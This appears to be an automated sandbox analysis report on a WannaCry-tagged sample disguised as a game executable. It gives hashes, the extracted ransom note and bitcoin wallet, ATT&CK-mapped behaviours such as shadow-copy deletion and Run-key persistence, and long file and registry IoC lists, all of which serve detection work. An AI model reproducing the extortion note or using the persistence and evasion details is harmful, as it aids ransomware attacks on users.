wannacry | cfd64f9ed065d19f7c488db3a8e29a553c9e61849b1d08765006110d73d3434b

Resubmissions

15-07-2024 12:26

240715-pmah5stdrh 10

15-07-2024 12:01

240715-n64ewsyfjb 10

15-07-2024 11:54

240715-n278aaxhmd 10

15-07-2024 11:32

240715-nnry5sthpm 10

Analysis

max time kernel
290s
max time network
281s
platform
windows7_x64
resource
win7-20240708-en
resource tags

arch:x64arch:x86image:win7-20240708-enlocale:en-usos:windows7-x64system
submitted
15-07-2024 12:01

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

yfga_game.exe
Size

46.7MB
MD5

9d846a2d794eb4614b3d0feaa6f83259
SHA1

ff6d194172fa313b8921a80cecc84f470d8dc2d0
SHA256

cfd64f9ed065d19f7c488db3a8e29a553c9e61849b1d08765006110d73d3434b
SHA512

6a8115aa70bd1d0d0af474a2d9d5f4ad03e2fa09277a1f3f3e6063682329b1b42aeef206f4a74d2fb76cd12afe4daf0bd1571c26c7121741a782241d3d28b521
SSDEEP

786432:c7Ud58tChs1g2uzRx7KPB8NUc3sXEPeEwkHYvgctIKpJZXnfsrQl92Z3tHDUOsj1:4t96L76B0HkGUvgcaKpDPBl92HHDdsGy

Score

10^/10

wannacry aspackv2 defense_evasion discovery evasion execution impact persistence ransomware spyware stealer upx worm

Malware Config

Extracted

Path

C:\Users\Admin\Desktop\yfga_game_dc152b52-85e4-4b09-861d-7d365833a691\@[email protected]

Family

wannacry

Ransom Note

Q: What's wrong with my files? A: Ooops, your important files are encrypted. It means you will not be able to access them anymore until they are decrypted. If you follow our instructions, we guarantee that you can decrypt all your files quickly and safely! Let's start decrypting! Q: What do I do? A: First, you need to pay service fees for the decryption. Please send $300 worth of bitcoin to this bitcoin address: 115p7UMMngoj1pMvkpHijcRdfJNXj6LrLn Next, please find an application file named "@[email protected]". It is the decrypt software. Run and follow the instructions! (You may need to disable your antivirus for a while.) Q: How can I trust? A: Don't worry about decryption. We will decrypt your files surely because nobody will trust us if we cheat users. * If you need our assistance, send a message by clicking <Contact Us> on the decryptor window. �

Wallets

115p7UMMngoj1pMvkpHijcRdfJNXj6LrLn

Signatures

Modifies visiblity of hidden/system files in Explorer 2 TTPs 1 IoCs

evasion

Hidden Files and Directories

T1564.001

Modify Registry

T1112

Processes:

WbVhxCIDDK.exe

description	ioc	process
Set value (int)	\REGISTRY\USER\S-1-5-21-1506706701-1246725540-2219210854-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden = "0"	WbVhxCIDDK.exe

Wannacry
WannaCry is a ransomware cryptoworm.
ransomware worm wannacry
Deletes shadow copies 3 TTPs
Ransomware often targets backup files to inhibit system recovery.
ransomware defense_evasion impact execution

File Deletion
T1070.004

Inhibit System Recovery
T1490

Windows Management Instrumentation
T1047
Disables Task Manager via registry modification
evasion

Drops file in Drivers directory 52 IoCs

Processes:

attrib.exe

description	ioc	process
File opened for modification	C:\Windows\SysWOW64\drivers\UMDF\it-IT	attrib.exe
File opened for modification	C:\Windows\SysWOW64\drivers\en-US	attrib.exe
File opened for modification	C:\Windows\SysWOW64\drivers\en-US\ndiscap.sys.mui	attrib.exe
File opened for modification	C:\Windows\SysWOW64\drivers\es-ES\scfilter.sys.mui	attrib.exe
File opened for modification	C:\Windows\SysWOW64\drivers\fr-FR\bfe.dll.mui	attrib.exe
File opened for modification	C:\Windows\SysWOW64\drivers\fr-FR\ndiscap.sys.mui	attrib.exe
File opened for modification	C:\Windows\SysWOW64\drivers\es-ES	attrib.exe
File opened for modification	C:\Windows\SysWOW64\drivers\es-ES\bfe.dll.mui	attrib.exe
File opened for modification	C:\Windows\SysWOW64\drivers\de-DE	attrib.exe
File opened for modification	C:\Windows\SysWOW64\drivers\de-DE\qwavedrv.sys.mui	attrib.exe
File opened for modification	C:\Windows\SysWOW64\drivers\en-US\bfe.dll.mui	attrib.exe
File opened for modification	C:\Windows\SysWOW64\drivers\UMDF\de-DE	attrib.exe
File opened for modification	C:\Windows\SysWOW64\drivers\UMDF\ja-JP	attrib.exe
File opened for modification	C:\Windows\SysWOW64\drivers\it-IT	attrib.exe
File opened for modification	C:\Windows\SysWOW64\drivers\en-US\tcpip.sys.mui	attrib.exe
File opened for modification	C:\Windows\SysWOW64\drivers\UMDF\en-US	attrib.exe
File opened for modification	C:\Windows\SysWOW64\drivers\UMDF\es-ES	attrib.exe
File opened for modification	C:\Windows\SysWOW64\drivers\de-DE\bfe.dll.mui	attrib.exe
File opened for modification	C:\Windows\SysWOW64\drivers\fr-FR\scfilter.sys.mui	attrib.exe
File opened for modification	C:\Windows\SysWOW64\drivers\es-ES\ndiscap.sys.mui	attrib.exe
File opened for modification	C:\Windows\SysWOW64\drivers\it-IT\qwavedrv.sys.mui	attrib.exe
File opened for modification	C:\Windows\SysWOW64\drivers\ja-JP\pacer.sys.mui	attrib.exe
File opened for modification	C:\Windows\SysWOW64\drivers\fr-FR\pacer.sys.mui	attrib.exe
File opened for modification	C:\Windows\SysWOW64\drivers\UMDF\fr-FR	attrib.exe
File opened for modification	C:\Windows\SysWOW64\drivers\es-ES\qwavedrv.sys.mui	attrib.exe
File opened for modification	C:\Windows\SysWOW64\drivers\it-IT\scfilter.sys.mui	attrib.exe
File opened for modification	C:\Windows\SysWOW64\drivers\ja-JP\bfe.dll.mui	attrib.exe
File opened for modification	C:\Windows\SysWOW64\drivers\ja-JP\tcpip.sys.mui	attrib.exe
File opened for modification	C:\Windows\SysWOW64\drivers\de-DE\pacer.sys.mui	attrib.exe
File opened for modification	C:\Windows\SysWOW64\drivers\fr-FR\qwavedrv.sys.mui	attrib.exe
File opened for modification	C:\Windows\SysWOW64\drivers\it-IT\bfe.dll.mui	attrib.exe
File opened for modification	C:\Windows\SysWOW64\drivers\it-IT\ndiscap.sys.mui	attrib.exe
File opened for modification	C:\Windows\SysWOW64\drivers\fr-FR	attrib.exe
File opened for modification	C:\Windows\SysWOW64\drivers\de-DE\ndiscap.sys.mui	attrib.exe
File opened for modification	C:\Windows\SysWOW64\drivers\gm.dls	attrib.exe
File opened for modification	C:\Windows\SysWOW64\drivers\de-DE\tcpip.sys.mui	attrib.exe
File opened for modification	C:\Windows\SysWOW64\drivers\en-US\scfilter.sys.mui	attrib.exe
File opened for modification	C:\Windows\SysWOW64\drivers\es-ES\tcpip.sys.mui	attrib.exe
File opened for modification	C:\Windows\SysWOW64\drivers\ja-JP\scfilter.sys.mui	attrib.exe
File opened for modification	C:\Windows\SysWOW64\drivers\en-US\qwavedrv.sys.mui	attrib.exe
File opened for modification	C:\Windows\SysWOW64\drivers\es-ES\pacer.sys.mui	attrib.exe
File opened for modification	C:\Windows\SysWOW64\drivers\UMDF	attrib.exe
File opened for modification	C:\Windows\SysWOW64\drivers\fr-FR\tcpip.sys.mui	attrib.exe
File opened for modification	C:\Windows\SysWOW64\drivers\it-IT\pacer.sys.mui	attrib.exe
File opened for modification	C:\Windows\SysWOW64\drivers\ja-JP	attrib.exe
File opened for modification	C:\Windows\SysWOW64\drivers\wimmount.sys	attrib.exe
File opened for modification	C:\Windows\SysWOW64\drivers\de-DE\scfilter.sys.mui	attrib.exe
File opened for modification	C:\Windows\SysWOW64\drivers\en-US\pacer.sys.mui	attrib.exe
File opened for modification	C:\Windows\SysWOW64\drivers\it-IT\tcpip.sys.mui	attrib.exe
File opened for modification	C:\Windows\SysWOW64\drivers\ja-JP\ndiscap.sys.mui	attrib.exe
File opened for modification	C:\Windows\SysWOW64\drivers\ja-JP\qwavedrv.sys.mui	attrib.exe
File opened for modification	C:\Windows\SysWOW64\drivers\gmreadme.txt	attrib.exe

Manipulates Digital Signatures 2 IoCs

Attackers can apply techniques such as modifying certain DLL exports to make their binary seem valid.

Processes:

attrib.exe

description	ioc	process
File opened for modification	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\pwrshsip.dll	attrib.exe
File opened for modification	C:\Windows\SysWOW64\wintrust.dll	attrib.exe

ASPack v2.12-2.42 2 IoCs

Detects executables packed with ASPack v2.12-2.42

aspackv2

Processes:

resource	yara_rule
C:\Users\Admin\Desktop\yfga_game_dc152b52-85e4-4b09-861d-7d365833a691\flasher.exe	aspack_v212_v242
C:\Users\Admin\Desktop\yfga_game_dc152b52-85e4-4b09-861d-7d365833a691\screenscrew.exe	aspack_v212_v242

Drops startup file 2 IoCs

Processes:

wannacryptor.exe

description	ioc	process
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\~SDAAFC.tmp	wannacryptor.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Word\STARTUP\~SDAB0F.tmp	wannacryptor.exe

Executes dropped EXE 25 IoCs

Processes:

YouAreAnIdiot.exeYouAreAnIdiot.exeYouAreAnIdiot.exescreenscrew.exeflasher.execalc.exewalliant.exeYouAreAnIdiot.exewalliant.tmpjokewarehydra.exewin7recovery.exeWbVhxCIDDK.exewannacryptor.exetaskdl.exe@[email protected]@[email protected]taskhsvc.exe@[email protected]@[email protected]@[email protected]@[email protected]@[email protected]@[email protected]@[email protected]@[email protected]

pid	process
2144	YouAreAnIdiot.exe
1704	YouAreAnIdiot.exe
1724	YouAreAnIdiot.exe
1480	screenscrew.exe
408	flasher.exe
1280	calc.exe
2492	walliant.exe
2296	YouAreAnIdiot.exe
920	walliant.tmp
1796	jokewarehydra.exe
2864	win7recovery.exe
1220	WbVhxCIDDK.exe
3300	wannacryptor.exe
876	taskdl.exe
3200	@[email protected]
3220	@[email protected]
1588	taskhsvc.exe
1916	@[email protected]
3352	@[email protected]
3960	@[email protected]
2208	@[email protected]
2172	@[email protected]
2776	@[email protected]
2504	@[email protected]
1608	@[email protected]

Loads dropped DLL 58 IoCs

Processes:

YouAreAnIdiot.exeWerFault.exeYouAreAnIdiot.exeWerFault.exeYouAreAnIdiot.exeWerFault.execmd.exewalliant.exeYouAreAnIdiot.exeWerFault.exewin7recovery.exewannacryptor.execscript.execmd.exe@[email protected]taskhsvc.exe

pid	process
2144	YouAreAnIdiot.exe
2144	YouAreAnIdiot.exe
1700	WerFault.exe
1700	WerFault.exe
1700	WerFault.exe
1700	WerFault.exe
1700	WerFault.exe
1704	YouAreAnIdiot.exe
1704	YouAreAnIdiot.exe
1484	WerFault.exe
1484	WerFault.exe
1484	WerFault.exe
1484	WerFault.exe
1484	WerFault.exe
1724	YouAreAnIdiot.exe
1724	YouAreAnIdiot.exe
1316	WerFault.exe
1316	WerFault.exe
1316	WerFault.exe
1316	WerFault.exe
1316	WerFault.exe
2592	cmd.exe
2592	cmd.exe
2592	cmd.exe
2592	cmd.exe
2492	walliant.exe
2296	YouAreAnIdiot.exe
2296	YouAreAnIdiot.exe
380	WerFault.exe
380	WerFault.exe
380	WerFault.exe
380	WerFault.exe
380	WerFault.exe
2592	cmd.exe
2864	win7recovery.exe
2864	win7recovery.exe
3300	wannacryptor.exe
3300	wannacryptor.exe
3212	cscript.exe
3300	wannacryptor.exe
3300	wannacryptor.exe
3204	cmd.exe
3200	@[email protected]
3200	@[email protected]
1588	taskhsvc.exe
1588	taskhsvc.exe
1588	taskhsvc.exe
1588	taskhsvc.exe
1588	taskhsvc.exe
1588	taskhsvc.exe
3300	wannacryptor.exe
3300	wannacryptor.exe
3300	wannacryptor.exe
3300	wannacryptor.exe
3300	wannacryptor.exe
3300	wannacryptor.exe
3300	wannacryptor.exe
3300	wannacryptor.exe

Modifies file permissions 1 TTPs 1 IoCs
discovery

File and Directory Permissions Modification
T1222

Processes:

icacls.exe

pid process

3576 icacls.exe
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

pid	process
3576	icacls.exe

UPX packed file 1 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

Processes:

resource	yara_rule
behavioral1/memory/2864-2034-0x0000000000600000-0x0000000000678000-memory.dmp	upx

Adds Run key to start application 2 TTPs 2 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

Processes:

reg.exewin7recovery.exe

description	ioc	process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\exmpfvgynhzzzhy763 = "\"C:\\Users\\Admin\\Desktop\\yfga_game_dc152b52-85e4-4b09-861d-7d365833a691\\tasksche.exe\""	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1506706701-1246725540-2219210854-1000\Software\Microsoft\Windows\CurrentVersion\Run\WbVhxCIDDK = "C:\\ProgramData\\WbVhxCIDDK.exe"	win7recovery.exe

Drops desktop.ini file(s) 52 IoCs

Processes:

attrib.exe

description	ioc	process
File opened for modification	C:\Windows\winsxs\amd64_microsoft-windows-s..ndthemes-characters_31bf3856ad364e35_6.1.7600.16385_none_08da32b0fdad9220\Desktop.ini	attrib.exe
File opened for modification	C:\Windows\winsxs\amd64_microsoft-windows-s..allpaper-landscapes_31bf3856ad364e35_6.1.7600.16385_none_e57abb2f66db71a9\Desktop.ini	attrib.exe
File opened for modification	C:\Windows\winsxs\amd64_microsoft-windows-s..ini-accessoriesuser_31bf3856ad364e35_6.1.7600.16385_none_7ff91f5d2dd6c770\Desktop.ini	attrib.exe
File opened for modification	C:\Windows\winsxs\amd64_microsoft-windows-s..undthemes-landscape_31bf3856ad364e35_6.1.7600.16385_none_7a83a914edc3de49\Desktop.ini	attrib.exe
File opened for modification	C:\Windows\winsxs\amd64_microsoft-windows-m..-gb-links-component_31bf3856ad364e35_6.1.7601.17514_none_0ea01e97df141032\desktop.ini	attrib.exe
File opened for modification	C:\Windows\winsxs\amd64_microsoft-windows-m..ttheme-au-component_31bf3856ad364e35_6.1.7601.17514_none_36a5754e72dd8aff\desktop.ini	attrib.exe
File opened for modification	C:\Windows\winsxs\amd64_microsoft-windows-m..ttheme-gb-component_31bf3856ad364e35_6.1.7601.17514_none_92d51a492ae12096\desktop.ini	attrib.exe
File opened for modification	C:\Windows\winsxs\amd64_microsoft-windows-s..undthemes-afternoon_31bf3856ad364e35_6.1.7600.16385_none_2a05e57d5ab3659e\Desktop.ini	attrib.exe
File opened for modification	C:\Windows\winsxs\amd64_microsoft-windows-m..-us-links-component_31bf3856ad364e35_6.1.7601.17514_none_b325aa489d61d3a5\desktop.ini	attrib.exe
File opened for modification	C:\Windows\winsxs\amd64_microsoft-windows-s..i-accessibilityuser_31bf3856ad364e35_6.1.7600.16385_none_bf396ba9226e0702\Desktop.ini	attrib.exe
File opened for modification	C:\Windows\winsxs\amd64_microsoft-windows-fontext_31bf3856ad364e35_6.1.7601.17514_none_fcab9df20a3cd55f\desktop.ini	attrib.exe
File opened for modification	C:\Windows\winsxs\amd64_microsoft-windows-musicsamples_31bf3856ad364e35_6.1.7600.16385_none_06495209cbd8e93b\desktop.ini	attrib.exe
File opened for modification	C:\Windows\winsxs\amd64_microsoft-windows-s..allpaper-characters_31bf3856ad364e35_6.1.7600.16385_none_bde0eaed84920a21\Desktop.ini	attrib.exe
File opened for modification	C:\Windows\winsxs\amd64_microsoft-windows-shell-sounds_31bf3856ad364e35_6.1.7600.16385_none_73076dd9cf3a9dce\Desktop.ini	attrib.exe
File opened for modification	C:\Windows\winsxs\amd64_microsoft-windows-shell-soundthemes-raga_31bf3856ad364e35_6.1.7600.16385_none_2fe300bf8e73cdbd\Desktop.ini	attrib.exe
File opened for modification	C:\Windows\winsxs\amd64_microsoft-windows-shell-wallpaper-nature_31bf3856ad364e35_6.1.7600.16385_none_d5909570704a09c0\Desktop.ini	attrib.exe
File opened for modification	C:\Windows\winsxs\amd64_microsoft-windows-gameexplorer_31bf3856ad364e35_6.1.7601.17514_none_a026547dd7dc8bbc\Desktop.ini	attrib.exe
File opened for modification	C:\Windows\winsxs\amd64_microsoft-windows-m..ttheme-us-component_31bf3856ad364e35_6.1.7601.17514_none_b52573ad8e4c2d89\desktop.ini	attrib.exe
File opened for modification	C:\Windows\winsxs\amd64_microsoft-windows-s..-soundthemes-garden_31bf3856ad364e35_6.1.7600.16385_none_f7a4bf1e15863e21\Desktop.ini	attrib.exe
File opened for modification	C:\Windows\winsxs\amd64_microsoft-windows-ie-objectcontrolviewer_31bf3856ad364e35_8.0.7600.16385_none_add5a10aa4d614d5\desktop.ini	attrib.exe
File opened for modification	C:\Windows\winsxs\amd64_microsoft-windows-ie-offlinefavorites_31bf3856ad364e35_8.0.7601.17514_none_da0c2f9edf5b1353\desktop.ini	attrib.exe
File opened for modification	C:\Windows\winsxs\amd64_microsoft-windows-s..ini-systemtoolsuser_31bf3856ad364e35_6.1.7600.16385_none_7ca09f65fd387e58\Desktop.ini	attrib.exe
File opened for modification	C:\Windows\winsxs\amd64_microsoft-windows-s..l-soundthemes-delta_31bf3856ad364e35_6.1.7600.16385_none_fbf7e0678b64a4b8\Desktop.ini	attrib.exe
File opened for modification	C:\Windows\winsxs\amd64_microsoft-windows-s..opini-accessibility_31bf3856ad364e35_6.1.7600.16385_none_36604ea896f9a97d\Desktop.ini	attrib.exe
File opened for modification	C:\Windows\winsxs\amd64_subsystem-for-unix-based-applications_31bf3856ad364e35_6.1.7601.17514_none_d20e5d35068f261a\Desktop.ini	attrib.exe
File opened for modification	C:\Windows\winsxs\amd64_microsoft-windows-m..ttheme-ca-component_31bf3856ad364e35_6.1.7601.17514_none_fae061a2e0ae5019\desktop.ini	attrib.exe
File opened for modification	C:\Windows\winsxs\amd64_microsoft-windows-mail-app_31bf3856ad364e35_6.1.7601.17514_none_4f7e32f76654bd3c\Desktop.ini	attrib.exe
File opened for modification	C:\Windows\winsxs\amd64_microsoft-windows-s..-soundthemes-quirky_31bf3856ad364e35_6.1.7600.16385_none_e55404efe49bb9cb\Desktop.ini	attrib.exe
File opened for modification	C:\Windows\winsxs\amd64_microsoft-windows-photosamples_31bf3856ad364e35_6.1.7600.16385_none_f36e0e659b8042be\desktop.ini	attrib.exe
File opened for modification	C:\Windows\winsxs\amd64_microsoft-windows-s..-soundthemes-sonata_31bf3856ad364e35_6.1.7600.16385_none_201752c112c5078c\Desktop.ini	attrib.exe
File opened for modification	C:\Windows\winsxs\amd64_microsoft-windows-shell-wallpaper-scenes_31bf3856ad364e35_6.1.7600.16385_none_a4393b1a254aeaee\Desktop.ini	attrib.exe
File opened for modification	C:\Windows\Fonts\desktop.ini	attrib.exe
File opened for modification	C:\Windows\winsxs\amd64_microsoft-windows-ringtonesamples_31bf3856ad364e35_6.1.7600.16385_none_135e536ebbe59c28\desktop.ini	attrib.exe
File opened for modification	C:\Windows\winsxs\amd64_microsoft-windows-s..ini-maintenanceuser_31bf3856ad364e35_6.1.7600.16385_none_61fc91b36f901b87\Desktop.ini	attrib.exe
File opened for modification	C:\Windows\winsxs\amd64_microsoft-windows-s..sktopini-sendtouser_31bf3856ad364e35_6.1.7600.16385_none_64398328adc9c59d\Desktop.ini	attrib.exe
File opened for modification	C:\Windows\winsxs\amd64_microsoft-windows-s..lpaper-architecture_31bf3856ad364e35_6.1.7600.16385_none_d99106b927aa7782\Desktop.ini	attrib.exe
File opened for modification	C:\Windows\winsxs\amd64_microsoft-windows-s..oundthemes-festival_31bf3856ad364e35_6.1.7600.16385_none_121f20b55f0bde68\Desktop.ini	attrib.exe
File opened for modification	C:\Windows\winsxs\amd64_microsoft-windows-s..ktopini-systemtools_31bf3856ad364e35_6.1.7600.16385_none_da623240a154f357\Desktop.ini	attrib.exe
File opened for modification	C:\Windows\winsxs\amd64_microsoft-windows-s..soundthemes-savanna_31bf3856ad364e35_6.1.7600.16385_none_8501e89d0b011992\Desktop.ini	attrib.exe
File opened for modification	C:\Windows\winsxs\amd64_microsoft-windows-s..ktopini-maintenance_31bf3856ad364e35_6.1.7600.16385_none_ba8f25a3b6d81a68\Desktop.ini	attrib.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\1033\DataServices\DESKTOP.INI	attrib.exe
File opened for modification	C:\Windows\winsxs\amd64_microsoft-windows-ehome-reg-inf_31bf3856ad364e35_6.1.7601.17514_none_535245f3d98ecb9a\desktop.ini	attrib.exe
File opened for modification	C:\Windows\winsxs\amd64_microsoft-windows-m..ttheme-za-component_31bf3856ad364e35_6.1.7601.17514_none_a5926b147a413e6a\desktop.ini	attrib.exe
File opened for modification	C:\Windows\winsxs\amd64_microsoft-windows-s..ktopini-accessories_31bf3856ad364e35_6.1.7600.16385_none_480c0d8bd31ae43f\Desktop.ini	attrib.exe
File opened for modification	C:\Windows\winsxs\amd64_microsoft-windows-s..undthemes-cityscape_31bf3856ad364e35_6.1.7600.16385_none_5b48f43248490503\Desktop.ini	attrib.exe
File opened for modification	C:\Windows\winsxs\amd64_microsoft-windows-ehome-samplemedia_31bf3856ad364e35_6.1.7600.16385_none_b6b9b223710b3802\desktop.ini	attrib.exe
File opened for modification	C:\Windows\winsxs\amd64_microsoft-windows-ie-offlinefavorites_31bf3856ad364e35_11.2.9600.16428_none_4382f60666c7c23b\desktop.ini	attrib.exe
File opened for modification	C:\Windows\winsxs\amd64_microsoft-windows-s..oundthemes-heritage_31bf3856ad364e35_6.1.7600.16385_none_5872c0830d0c4747\Desktop.ini	attrib.exe
File opened for modification	C:\Windows\winsxs\amd64_microsoft-windows-videosamples_31bf3856ad364e35_6.1.7600.16385_none_51a21f033003affd\desktop.ini	attrib.exe
File opened for modification	C:\Windows\winsxs\amd64_microsoft-windows-ie-objectcontrolviewer_31bf3856ad364e35_11.2.9600.16428_none_197d7b3a29314757\desktop.ini	attrib.exe
File opened for modification	C:\Windows\winsxs\amd64_microsoft-windows-s..dthemes-calligraphy_31bf3856ad364e35_6.1.7600.16385_none_c1407bc73caf8dfc\Desktop.ini	attrib.exe
File opened for modification	C:\Windows\winsxs\amd64_microsoft-windows-tabletpc-journal_31bf3856ad364e35_6.1.7601.17514_none_75d78dc0bb37c026\Desktop.ini	attrib.exe

File and Directory Permissions Modification: Windows File and Directory Permissions Modification 1 TTPs
defense_evasion

Windows File and Directory Permissions Modification
T1222.001

Drops file in System32 directory 64 IoCs

Processes:

attrib.exe

description	ioc	process
File opened for modification	C:\Windows\System32\DriverStore\FileRepository\prnrc006.inf_amd64_neutral_7e12a60cc98d3f89\Amd64\RIA25506.GPD	attrib.exe
File opened for modification	C:\Windows\System32\DriverStore\fr-FR\brmfcmdm.inf_loc	attrib.exe
File opened for modification	C:\Windows\System32\DriverStore\fr-FR\netg664.inf_loc	attrib.exe
File opened for modification	C:\Windows\SysWOW64\es-ES\rpcrt4.dll.mui	attrib.exe
File opened for modification	C:\Windows\SysWOW64\ja-JP\wzcdlg.dll.mui	attrib.exe
File opened for modification	C:\Windows\SysWOW64\migwiz\dlmanifests\eudcedit-dl.man	attrib.exe
File opened for modification	C:\Windows\SysWOW64\migwiz\dlmanifests\MediaServer-Multicast-Migration-DL.man	attrib.exe
File opened for modification	C:\Windows\System32\DriverStore\FileRepository\prnky003.inf_amd64_neutral_fe7ea176f20ab839\Amd64\KYUD1100.GDL	attrib.exe
File opened for modification	C:\Windows\SysWOW64\de-DE\syncreg.dll.mui	attrib.exe
File opened for modification	C:\Windows\System32\DriverStore\de-DE\sffdisk.inf_loc	attrib.exe
File opened for modification	C:\Windows\System32\DriverStore\FileRepository\prngt002.inf_amd64_neutral_df2060d80de9ff13\Amd64\GS2510.GPD	attrib.exe
File opened for modification	C:\Windows\SysWOW64\IME\IMETC10	attrib.exe
File opened for modification	C:\Windows\SysWOW64\it-IT\RunLegacyCPLElevated.exe.mui	attrib.exe
File opened for modification	C:\Windows\SysWOW64\wbem\fr-FR\WmiPerfClass.dll.mui	attrib.exe
File opened for modification	C:\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\prnky007.cat	attrib.exe
File opened for modification	C:\Windows\SysWOW64\de-DE\iprtrmgr.dll.mui	attrib.exe
File opened for modification	C:\Windows\System32\DriverStore\FileRepository\mdmtdkj2.inf_amd64_neutral_0cf7696e2236ca4e\mdmtdkj2.inf	attrib.exe
File opened for modification	C:\Windows\System32\DriverStore\FileRepository\prnrc303.inf_amd64_ja-jp_b0dcc6693f67451a	attrib.exe
File opened for modification	C:\Windows\SysWOW64\en-US\msports.dll.mui	attrib.exe
File opened for modification	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\de-DE\about_escape_characters.help.txt	attrib.exe
File opened for modification	C:\Windows\SysWOW64\de-DE\SystemPropertiesDataExecutionPrevention.exe.mui	attrib.exe
File opened for modification	C:\Windows\System32\DriverStore\FileRepository\netvwifibus.inf_amd64_neutral_9d0740f32ce81d24\netvwifibus.inf	attrib.exe
File opened for modification	C:\Windows\System32\DriverStore\FileRepository\prnnr002.inf_amd64_neutral_37896c5e81c8d488\Amd64\NR1600.GPD	attrib.exe
File opened for modification	C:\Windows\System32\DriverStore\ja-JP\dot4.inf_loc	attrib.exe
File opened for modification	C:\Windows\SysWOW64\spp\tokens\ppdlic	attrib.exe
File opened for modification	C:\Windows\SysWOW64\KBDCZ1.DLL	attrib.exe
File opened for modification	C:\Windows\SysWOW64\ufat.dll	attrib.exe
File opened for modification	C:\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Help-CoreClientUASE-Package~31bf3856ad364e35~amd64~en-US~6.1.7600.16385.cat	attrib.exe
File opened for modification	C:\Windows\System32\DriverStore\FileRepository\wiabr006.inf_amd64_neutral_0232ca4f23224d01\wiabr006.inf	attrib.exe
File opened for modification	C:\Windows\SysWOW64\migration\WSMT\rras\dlmanifests	attrib.exe
File opened for modification	C:\Windows\SysWOW64\gcdef.dll	attrib.exe
File opened for modification	C:\Windows\SysWOW64\LAPRXY.DLL	attrib.exe
File opened for modification	C:\Windows\System32\DriverStore\FileRepository\prnms002.inf_amd64_neutral_d834e48846616289\Amd64\FXSWZRD.DLL	attrib.exe
File opened for modification	C:\Windows\SysWOW64\wbem\de-DE\wininit.mfl	attrib.exe
File opened for modification	C:\Windows\System32\DriverStore\FileRepository\prngt002.inf_amd64_neutral_df2060d80de9ff13\Amd64\GS5000B.GPD	attrib.exe
File opened for modification	C:\Windows\System32\DriverStore\FileRepository\termmou.inf_amd64_neutral_207a02df8e9e6552\terminpt.sys	attrib.exe
File opened for modification	C:\Windows\System32\DriverStore\ja-JP\nete1e3e.inf_loc	attrib.exe
File opened for modification	C:\Windows\SysWOW64\fr-FR\KernelBase.dll.mui	attrib.exe
File opened for modification	C:\Windows\System32\DriverStore\FileRepository\prnca00b.inf_amd64_neutral_4412894f52d39895\Amd64\CNB_0332.GPD	attrib.exe
File opened for modification	C:\Windows\System32\DriverStore\FileRepository\prnnr003.inf_amd64_neutral_c07c33bfb5764bdb\Amd64\NRC420D6.GPD	attrib.exe
File opened for modification	C:\Windows\SysWOW64\en-US\sppcc.dll.mui	attrib.exe
File opened for modification	C:\Windows\SysWOW64\es-ES\cryptui.dll.mui	attrib.exe
File opened for modification	C:\Windows\SysWOW64\fr-FR\eventvwr.exe.mui	attrib.exe
File opened for modification	C:\Windows\SysWOW64\it-IT\stobject.dll.mui	attrib.exe
File opened for modification	C:\Windows\SysWOW64\de-DE\mprmsg.dll.mui	attrib.exe
File opened for modification	C:\Windows\System32\DriverStore\it-IT\machine.inf_loc	attrib.exe
File opened for modification	C:\Windows\System32\DriverStore\FileRepository\prnrc007.inf_amd64_neutral_2df575afa0f7d35f\Amd64\RI1312E3.PPD	attrib.exe
File opened for modification	C:\Windows\System32\DriverStore\FileRepository\prnky003.inf_amd64_neutral_fe7ea176f20ab839\prnky003.inf	attrib.exe
File opened for modification	C:\Windows\System32\DriverStore\ja-JP\wiaca00b.inf_loc	attrib.exe
File opened for modification	C:\Windows\SysWOW64\en-US\Licenses\_Default\HomeBasicE\license.rtf	attrib.exe
File opened for modification	C:\Windows\SysWOW64\es-ES\bitsadmin.exe.mui	attrib.exe
File opened for modification	C:\Windows\SysWOW64\asferror.dll	attrib.exe
File opened for modification	C:\Windows\SysWOW64\de-DE\hhctrl.ocx.mui	attrib.exe
File opened for modification	C:\Windows\System32\DriverStore\FileRepository\prnca003.inf_amd64_neutral_8e91d4aa9330d2f8\Amd64\CNN0B007.INI	attrib.exe
File opened for modification	C:\Windows\System32\DriverStore\FileRepository\prnep00l.inf_amd64_neutral_f1fa021d2221e2c7\prnep00L.cat	attrib.exe
File opened for modification	C:\Windows\System32\DriverStore\FileRepository\wiaky002.inf_amd64_neutral_b898f5982403f3cb\kyweds10.dll	attrib.exe
File opened for modification	C:\Windows\SysWOW64\ja-JP\lpeula.rtf	attrib.exe
File opened for modification	C:\Windows\System32\DriverStore\es-ES\cpu.inf_loc	attrib.exe
File opened for modification	C:\Windows\System32\DriverStore\es-ES\prnep00g.inf_loc	attrib.exe
File opened for modification	C:\Windows\System32\DriverStore\FileRepository\prnbr002.inf_amd64_neutral_db1d8c9efda9b3c0\Amd64\BRF2480C.GPD	attrib.exe
File opened for modification	C:\Windows\System32\DriverStore\fr-FR\netrtx64.INF_loc	attrib.exe
File opened for modification	C:\Windows\SysWOW64\fr-FR\Licenses\_Default\Enterprise\license.rtf	attrib.exe
File opened for modification	C:\Windows\SysWOW64\it-IT\dialer.exe.mui	attrib.exe
File opened for modification	C:\Windows\SysWOW64\wbem\SchedSvc.mof	attrib.exe

Sets desktop wallpaper using registry 2 TTPs 3 IoCs

ransomware

Defacement

T1491

Modify Registry

T1112

Processes:

reg.exewannacryptor.exe@[email protected]

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-1506706701-1246725540-2219210854-1000\Control Panel\Desktop\WallPaper = "C:\\Windows\\System32\\FeatureToastBulldogImg.png"	reg.exe
